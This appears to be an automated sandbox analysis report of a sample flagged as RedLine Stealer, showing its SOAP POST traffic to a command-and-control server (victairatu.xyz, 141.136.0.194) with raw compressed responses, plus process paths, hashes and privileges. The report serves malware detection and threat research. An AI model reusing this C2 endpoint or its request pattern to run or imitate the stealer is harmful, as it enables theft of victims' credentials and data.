                                                                        Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 5b 76 29 e1 f6 5a 29 5f 8c 33 10 17 c7 13 d9 ce 06 56 f7 e3 eb 84 84 5d f6 6e ab 12 d3 4a 88 c4 33 9e 27 e3 f1 78 fc d8 5d d5 f1 c4 23 70 4c c0 d9 c6 5c a8 8e fa d8 88 b4 4e 3a ae ab 68 04 31 51 2d 23 57 48 92 16 ca b5 9b bf b8 50 5a b8 8d 5e 57 75 06 18 ee 7a 5d 83 c2 24 8a 18 84 f6 41 6b 26 d6 6a 0e 2a 41 a1 4a e0 03 ac 86 38 49 25 2b e0 1a 6f 19 a6 5c 97 fe 90 8f 8d 81 c4 4c 81 f4 b6 1a 84 62 28 1a a5 8a 1d 30 b3 2c 6b 65 57 05 e4 4f ed f6 7b f7 8f e9 ad 5f 78 7f c9 84 d2 44 50 30 5f 22 9d 01 47 ba 81 70 88 a9 d0 72 57 a2 2c bf 19 70 cc a8 44 85 2b dd a2 18 e7 80 57 ee fb b6 eb 83 64 84 b3 27 a2 8d 0b 6e 5f 4a b2 53 0d f7 05 ec 64 76 36 c4 fb e5 5f 40 f5 cf 3d 2d 53 e8 ba cf ed 83 ea ba b7 22 5c bd d0 5d e7 3a 9f 12 51 06 4b 1d 6c 8f 84 65 a7 61 24 31 86 4a 3a 23 3a 52 e7 f0 bd d7 5d 76 94 96 66 0e 7b 17 9f 7d 6f 3e 9b df 8f 27 b7 de 45 d0 4f 92 11 d1 24 b8 45 4a 78 30 20 5a 73 68 09 d0 5d f7 60 f0 ef 4c 0b c7 59 1a 07 9f 8d e3 4e ae 38 19 e2 06 71 cd 61 8f 04 d6 38 3f 6c 3f 5c ff 68 03 36 47 12 1b 6d 70 9f 80 24 8e 6f e2 9c 11 09 c1 c9 ee 4c 49 c2 c1 d7 69 c8 b0 74 67 c6 53 65 31 be 89 64 a1 5d a4 7f f5 35 91 e5 7f 7d 94 a1 a9 0c 65 a6 da a0 44 10 a2 b6 00 78 60 8f 84 87 cc 02 e1 93 99 13 d3 a8 0f e0 71 c8 cb a4 72 ec c3 e1 25 8c 3a 33 69 c6 44 77 67 80 4b 87 f8 34 85 90 99 d1 49 22 2c 80 c6 20 24 93 ce 44 d0 c0 e7 c0 12 c1 e4 2f 81 da ef 0b 41 8c 61 ca 41 1d 8a c0 03 83 0c e4 e9 a9 60 5e 39 13 e4 46 62 9a 04 43 66 2c d0 26 b3 10 33 14 d5 a3 3e 0e 67 b0 24 36 8e fc 6e 36 20 3f 95 2b 0b 88 7b b9 64 da 6a cd 0f d1 cc 12 06 23 49 d6 56 d1 e8 c7 6c bd 0f 86 05 c8 02 25 8d 2c ec ff 24 22 84 6d f9 38 43 0d da c7 a6 3e c0 d5 75 bb f2 c2 de 9b 29 d9 ea 08 c5 95 4d 45 bb 9c 1a 22 68 33 cd 7e 92 6a c1 36 87 67 7d a4 3b 46 6d 77 f4 21 52 f3 3b 43 68 2d 8b 60 51 df ec 32 65 4a 18 6f cd d3 a0 af d1 66 35 0f 24 79 84 03 27 29 5a 97 67 c8 bc 8a 51 06 5e b8 b6 99 b0 bb 87 c9 68 d2 77 86 28 13 94 05 13 ad 44 37 30 36 6b 1f 1c 6f 6b 68 15 03 73 00 38 3d 35 35 90 f8 f4 b9 93 bb 44 e3 82 2c ff 79 57 75 df e4 e1 15 45 1f 31 45 51 86 cf 3c ff a5 b0 ec 33 5e cc 8e 68 7e de ae 54 cc ec 94 c7 c6 7b d1 4b fd 7f 42 fc 53 33 94 44 e2 ca 7c e0 22 18 81 da 68 4c be 36 5b 7a ab df 35 5b 21 d2 e6 bb e6 06 76 e6 3f 23 9c 83 36 2f 0a 20 6c 7e 6d 7f 3f d6 c7 70 48 d3 82 02 9d 0c e8 be 1e 76 15 88 1b a0 1b fc ff 4f 42 15 ed 9f e2 13 e3 9c 04 63 26 61 85 db 1a 07 87 2f 44 83 ac 67 5a d4 6f 40 51 c3 74 11 a5 66 53 34 74 41 86 35 ac cb 9d 70 42 61 4f 14 6a 40 7c 48 80 6e 55 71 de 31 8c 70 b7 ac 1b 83 3b 6f 71 d3 5f 78 ce 02 68 24 90 e3 9a 19 86 39 e0 84 6e 7e 23 59 0d bc 29 a2 a0 11 e3 a1 a1 d7 86 af d2 3c 2b 54 30 23 1c 9c 5c f5 9d 9c fc 36 03 ab dc f4 a9 04 10 c7 ab b8 94 55 3d f2 22 f5 aa 43 21 2a f5 0b 33 bf 6b f9 ba cb 41 5a f6 7a 98 dd 1d 77 c8 05 a5 ee 4b b1 a8 8e af 13 2a 59 d7 7d f3 f6 e6 4d 5d 71 25 64 b4 d5 c5 91 fb 7c 03 d5 fb 1b 9c b4 72 7e 8e 12 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 3e4Xm6+J-%\K[v)Z)_3V]nJ3'x]#pL\N:h1Q-#WHPZ^Wuz]$Ak&j*AJ8I%+o\Lb(0,keWO{_xDP0_"GprW,pD+Wd'n_JSdv6_@=-S"\]:QKlea$1J:#:R]vf{}o>'EO$EJx0 Zsh]`LYN8qa8?l?\h6Gmp$oLIitgSe1d]5}eDx`qr%:3iDwgK4I", $D/AaA`^9FbCf,&3>g$6n6 ?+{dj#IVl%,$"m8C>u)ME"h3~j6g};Fmw!R;Ch-`Q2eJof5$y')ZgQ^hw(D706kokhs8=55D,yWuE1EQ<3^h~T{KBS3D|"hL6[z5[!v?#6/ l~m?pHvOBc&a/DgZo@QtfS4tA5pBaOj@|HnUq1p;oq_xh$9n~#Y)<+T0#\6U="C!*3kAZzwK*Y}M]q%d|r~0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349737141.136.0.19480C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Aug 3, 2021 22:48:30.374692917 CEST1243OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                        Host: victairatu.xyz
                                                                        Content-Length: 12087
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Aug 3, 2021 22:48:30.418421984 CEST1243INHTTP/1.1 100 Continue
                                                                        Aug 3, 2021 22:48:30.615509033 CEST1255INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 03 Aug 2021 20:48:30 GMT
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Keep-Alive: timeout=3
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.349738141.136.0.19480C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Aug 3, 2021 22:48:30.915970087 CEST1256OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                        Host: victairatu.xyz
                                                                        Content-Length: 12079
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: Keep-Alive
                                                                        Aug 3, 2021 22:48:30.962687969 CEST1256INHTTP/1.1 100 Continue
                                                                        Aug 3, 2021 22:48:31.137005091 CEST1269INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 03 Aug 2021 20:48:31 GMT
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Keep-Alive: timeout=3
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:22:48:03
                                                                        Start date:03/08/2021
                                                                        Path:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\7d9bXpW0im.exe'
                                                                        Imagebase:0x90000
                                                                        File size:273408 bytes
                                                                        MD5 hash:0F838CF9AC70E706AB24F4555618186C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:22:48:04
                                                                        Start date:03/08/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >